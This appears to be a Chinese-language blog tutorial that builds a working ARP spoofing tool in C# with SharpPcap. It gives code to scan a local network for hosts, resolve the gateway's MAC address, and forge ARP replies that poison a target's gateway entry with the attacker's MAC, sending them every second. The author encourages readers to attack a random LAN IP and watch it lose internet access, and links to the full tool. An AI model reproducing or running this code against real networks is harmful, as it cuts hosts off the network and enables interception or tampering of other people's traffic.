摘一段來自網上的arp欺詐解釋:ARP欺騙(ARP spoofing),又稱ARP毒化(ARP poisoning,網路上多譯為ARP病毒)或ARP攻擊,是針對乙太網地址解析協議(ARP)的一種攻擊技術,透過欺騙區域網內訪問者PC的閘道器MAC地址,使訪問者PC錯以為攻擊者更改後的MAC地址是閘道器的MAC,導致網路不通。此種攻擊可讓攻擊者獲取區域網上的資料包甚至可篡改資料包,且可讓網路上特定計算機或所有計算機無法正常連線。
換做我的話就是:告訴目標主機錯誤的閘道器MAC地址,這樣直接讓目標主機無法透過閘道器訪問網際網路或者其他網段的乙太網。
主機欺詐
建立一個arp包,將閘道器ip地址和錯誤的閘道器mac地址傳送給目標主機,讓主機更新錯誤的mac-ip地址對映到快取中。
工具
開源的.net arp庫: SharpPcap,PacketDotNet
專案中匯入:
<PackageReference Include="PacketDotNet" Version="1.4.7" />
<PackageReference Include="SharpPcap" Version="6.2.5" />
實戰
獲取本機所有的網路裝置
LibPcapLiveDeviceList.Instance
獲取對應裝置的ip和mac地址,以及閘道器ip
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
{
//ipv4地址
if (address.Addr.ipAddress.AddressFamily == AddressFamily.InterNetwork)
{
LocalIp = address.Addr.ipAddress;
break;
}
}
}
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.HARDWARE)
{
LocalMac = address.Addr.hardwareAddress; // 本機MAC
}
}
var gw = LibPcapLiveDevice.Interface.GatewayAddresses; // 閘道器IP
//ipv4的gateway
GatewayIp = gw?.FirstOrDefault(x => x.AddressFamily == AddressFamily.InterNetwork);
獲取閘道器mac地址
透過傳送arp包到閘道器,獲取響應包,從響應包中獲取mac地址。
1.建立arp包
var ethernetPacket = new EthernetPacket(localMac, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), destinationIP, localMac, localIP);
ethernetPacket.PayloadPacket = arpPacket;
2.傳送arp包到閘道器,並且等待下一個回覆包。
LibPcapLiveDevice.Open(DeviceModes.Promiscuous, 20);
LibPcapLiveDevice.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
ArpPacket arpPacket = null;
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(request);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)//是否是一個arp包
{
continue;
}
if (arpPacket.SenderProtocolAddress.Equals(destIP))
{
break;
}
}
}
// free the device
LibPcapLiveDevice.Close();
return arpPacket?.SenderHardwareAddress;
掃描區域網內活動ip和mac地址
1.設定掃描的ip區間,生成每個ip的arp請求包
var arpPackets = new Packet[targetIPList.Count];
for (int i = 0; i < arpPackets.Length; ++i)
{
arpPackets[i] = BuildRequest(targetIPList[i], LocalMac, LocalIp);
}
2.傳送arp包到各個ip,如果回覆了則線上,超時則認為不活動
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(arpPackets[i]);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
var arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)
{
continue;
}
//回覆的arp包並且是我們請求的ip地址
if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
{
Application.Current.Dispatcher.Invoke(() =>
{
///增加到IPlist中
Computers.Add(new Computer()
{
IPAddress = arpPacket.SenderProtocolAddress.ToString(),
MacAddress = arpPacket.SenderHardwareAddress?.ToString(),
});
});
break;
}
}
}
指定ip/ips攻擊
攻擊包就不能建立請求包, 應該偽造一個來自閘道器的響應包,從而將閘道器錯誤的mac地址更新到目標主機的快取中。
1.建立錯誤的響應包
private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Response, destMac, destIP, senderMac, senderIP);
ethernetPacket.PayloadPacket = arpPacket;
return ethernetPacket;
}
呼叫建立arp響應包,但是可以看到最後一個mac地址,應該是閘道器的mac地址,我們替換成了自己本地mac地址。
BuildResponse(IPAddress.Parse(compute.IPAddress), PhysicalAddress.Parse(compute.MacAddress), GatewayIp, LocalMac);
2.直接以1000ms的間隔輪詢傳送響應包到目標主機
var aTask = Task.Run(async () =>
{
while (true)
{
if (_cancellationTokenSource1.IsCancellationRequested)
{
break;
}
try
{
LibPcapLiveDevice.SendPacket(packet);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
await Task.Delay(1000);
}
LibPcapLiveDevice.Close();
}, _cancellationTokenSource1.Token);
效果
隨機選一個區域網ip攻擊它吧!看他不能上網的樣子。切記僅限於娛樂,不要影響任何工作和業務。
完整程式碼和工具
https://github.com/BruceQiu1996/ArpSpoofing
工具介面
參考文件
https://www.cnblogs.com/fantacity/p/4792689.html
https://github.com/dotpcap/sharppcap